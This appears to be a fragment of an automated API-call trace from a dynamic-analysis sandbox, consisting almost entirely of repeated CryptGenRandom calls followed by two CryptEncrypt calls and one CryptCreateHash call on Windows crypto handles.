[0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.771] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.772] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.773] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.774] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.776] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0169.777] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0169.777] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 